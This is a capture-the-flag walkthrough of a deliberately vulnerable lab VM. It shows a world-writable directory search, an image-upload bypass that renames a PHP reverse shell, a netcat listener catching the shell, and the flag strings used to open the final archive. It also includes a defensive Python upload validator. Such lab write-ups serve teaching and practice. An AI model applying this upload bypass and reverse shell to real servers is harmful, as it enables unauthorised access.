bigtommysenior@CallahanAutoSrv01:~$ cp callahanbak.bak /var/www/html/index.html
That should have done it, so let's reload the webpage and see.

Awesome, so the main part of the VM is now complete. I’ve restored the website and it’s back up and running again.

So there are just a few things left to do to be able to fully say I’ve completed the VM.

I need to get the 5th flag text and also there was a LOOT.zip file in Big Tom’s ssh account.

Let's jump back in and see if we can tick these off too.

First up, let's see what the loot file is.
It's password protected!!!! :-(

Let's go after the 5th flag text. It's owned by www-data, so I'm thinking I need a web exploit to get access and then cat the file. I need a way to upload my trusty PHP reverse shell. After a lot of googling I found out I needed to find some writeable dirs. Let's look for world-writeable directories using the command I found from the Google search.

bigtommysenior@CallahanAutoSrv01:/$ find / -perm -2 -type d 2>/dev/null
/var/lib/php/sessions
/var/crash
/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads

That looks really interesting. I completely forgot Nick has his own webserver running where he uploads his own super secret stuff. Let's navigate to that and see what's going on there and if we can use it.

Ok so let's try and upload our PHP script (after checking it's been modified to the correct IP address this time). I'll start a listener ready for the script:

nc -l -v -p 2007

I tried to upload the PHP file with the .php extension and I got an error saying only image files are allowed. So let's change the extension and try again to get it uploaded.

That worked and the webpage tells me the file has been uploaded to the /uploads folder. I’ll try to launch the script by navigating to the upload location.

I'm such an idiot sometimes: trying to get to the upload folder I realised my "script" is now just sitting there as a .jpg with errors on it.
Ok, let's upload it again and this time use Tamper Data to intercept it and change the file extension.
That didn't work, what am I doing wrong?? This is infuriating. I think it's time for a tea break and mental regroup. I'm so close now, but currently getting nowhere.

That was it, whilst enjoying a new nespresso blend that arrived in the post yesterday, it hit me.
I already own the server my reverse shell is sitting on. All I’ve got to do is change the file extension from the terminal.
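Why the extension check on Nick's upload form was never enough, as an added example written for this walkthrough (my own code, not the VM's): a validator that requires the client-chosen extension, the declared Content-Type and the file's magic bytes to agree, stores the file under a random server-chosen name with no execute bit, and refuses to use a world-writable upload directory like the one the find command turned up. The sample JPEG header and PHP snippet are constructed.

```python
import os
import secrets
import stat
import tempfile

# Image types the form is meant to accept: MIME type -> (canonical extension, magic-byte prefixes).
SIGNATURES = {
    "image/jpeg": (".jpg", [b"\xff\xd8\xff"]),
    "image/png": (".png", [b"\x89PNG\r\n\x1a\n"]),
    "image/gif": (".gif", [b"GIF87a", b"GIF89a"]),
}
EXT_TO_MIME = {".jpg": "image/jpeg", ".jpeg": "image/jpeg",
               ".png": "image/png", ".gif": "image/gif"}


class UploadRejected(Exception):
    pass


def sniff_mime(content: bytes):
    """Identify the real type from the leading bytes, ignoring the file name entirely."""
    for mime, (_, magics) in SIGNATURES.items():
        if any(content.startswith(m) for m in magics):
            return mime
    return None


def validate_upload(filename: str, declared_mime: str, content: bytes) -> str:
    """Return the canonical extension to store under, or raise UploadRejected.
    Three independent checks must agree: the client-chosen extension is on the
    allow-list (the only check Nick's form did), the declared Content-Type matches
    it, and the bytes really start with that type's magic number. A script renamed
    to .jpg passes the first check and fails the third."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in EXT_TO_MIME:
        raise UploadRejected(f"extension {ext!r} is not allowed")
    expected = EXT_TO_MIME[ext]
    if declared_mime != expected:
        raise UploadRejected(f"Content-Type {declared_mime!r} does not match {ext}")
    sniffed = sniff_mime(content)
    if sniffed != expected:
        raise UploadRejected(f"content looks like {sniffed}, not {expected}")
    return SIGNATURES[expected][0]


def store_upload(upload_dir: str, filename: str, declared_mime: str, content: bytes) -> str:
    """Write a validated upload under a random server-chosen name. The directory
    must not be world-writable (the VM's uploads dir was, which is what let a
    logged-in user rename the file to .php) and should sit outside the web root
    or have script execution disabled for it."""
    ext = validate_upload(filename, declared_mime, content)
    if os.stat(upload_dir).st_mode & stat.S_IWOTH:
        raise UploadRejected("refusing to use a world-writable upload directory")
    path = os.path.join(upload_dir, secrets.token_hex(16) + ext)
    with open(path, "xb") as fh:          # 'x': never overwrite an existing file
        fh.write(content)
    os.chmod(path, 0o640)                 # data only, never executable
    return path


def is_rejected(filename: str, declared_mime: str, content: bytes) -> bool:
    try:
        validate_upload(filename, declared_mime, content)
    except UploadRejected:
        return True
    return False


# Constructed sample inputs: a minimal JPEG/JFIF header and a PHP snippet carrying an image name.
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 16
PHP_AS_JPG = b"<?php echo 'not really an image'; ?>\n"


def demo() -> dict:
    """Run the cases from the walkthrough through the validator."""
    upload_dir = tempfile.mkdtemp()       # created mode 0700: not world-writable
    stored = store_upload(upload_dir, "photo.JPG", "image/jpeg", REAL_JPEG)
    return {
        "php_named_jpg_rejected": is_rejected("php-reverse-shell.jpg", "image/jpeg", PHP_AS_JPG),
        "php_ext_rejected": is_rejected("shell.php", "application/x-php", PHP_AS_JPG),
        "mime_mismatch_rejected": is_rejected("photo.png", "image/jpeg", REAL_JPEG),
        "real_jpeg_accepted": not is_rejected("photo.jpg", "image/jpeg", REAL_JPEG),
        "stored_ext": os.path.splitext(stored)[1],
        "stored_name_is_random": os.path.basename(stored) != "photo.JPG",
        "stored_mode": stat.S_IMODE(os.stat(stored).st_mode),
        "stored_size": os.path.getsize(stored),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:26} {value}")
```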

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls
index.html php-reverse-shell.jpg

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ mv php-reverse-shell.jpg shell.php

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls
index.html shell.php

Bingo. Ok, I've still got my netcat listener fired up and waiting, so let's navigate to the shell file in Firefox:

http://192.168.211.133:8008/NickIzL33t/P4TCH_4D4MS/uploads/shell.php

and switch to the 2nd terminal window with the listener

root@kali:~# nc -l -v -p 2007
listening on [any] 2007 ...
192.168.211.133: inverse host lookup failed: Unknown host
connect to [192.168.211.132] from (UNKNOWN) [192.168.211.133] 40526
Linux CallahanAutoSrv01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
05:00:14 up 7:53, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bigtommy pts/0 192.168.211.132 03:46 37.00s 1.15s 1.15s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

I love that reverse shell script, it’s worked on 4 of these VM’s now.

A quick whoami and a pwd confirms I’m logged in as www-data and I’m in the root dir

$ cat .5.txt
FIFTH FLAG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
YOU DID IT!!!!!!!!!!!!!!!!!!!!!!!!!!!!
OH RICHARD DON’T RUN AWAY FROM YOUR FEELINGS!!!!!!!!

Flag data: Buttcrack

Ok, so NOW what you do is take the flag data from each flag and blob it into one big chunk.
So for example, if flag 1 data was “hi” and flag 2 data was “there” and flag 3 data was “you”
you would create this blob:

hithereyou

Do this for ALL the flags sequentially, and this password will open the loot.zip in Big Tom’s
folder and you can call the box PWNED.
$

Awesome, I’m pretty much there. The flag strings from my working notes are
flag 01 = B34rcl4ws
flag 02 = Z4l1nsky
flag 03 = TinyHead
flag 04 = EditButton
flag 05 = Buttcrack

so the password for the LOOT zip is B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

Let's unzip the file and complete the VM.

bigtommysenior@CallahanAutoSrv01:~$ unzip LOOT.ZIP
Archive: LOOT.ZIP
[LOOT.ZIP] THE-END.txt password:
inflating: THE-END.txt

bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt

YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!
I’d love to know that you finished this VM, and/or get your suggestions on how to make the next
one better.
Please shoot me a note at 7ms @ 7ms.us with subject line “Here comes the meat wagon!”
Or, get in touch with me other ways:
* Twitter:
@7MinSec
* IRC (Freenode): #vulnhub (username is braimee)
Lastly, please don’t forget to check out
www.7ms.us and subscribe to the podcast at
bit.ly/7minsec
</shamelessplugs>

Thanks and have a blessed week!

  • Brian Johnson
    7 Minute Security

Wow, this has been the most enjoyable VM I’ve done to date, even including the amazing Mr Robot VM. Huge thanks to Brian Johnson for creating it. I think I’m going to watch Tommy Boy now after all this.

Tactical Threat Manager @ FinTech | Purple Team | Offensive Operations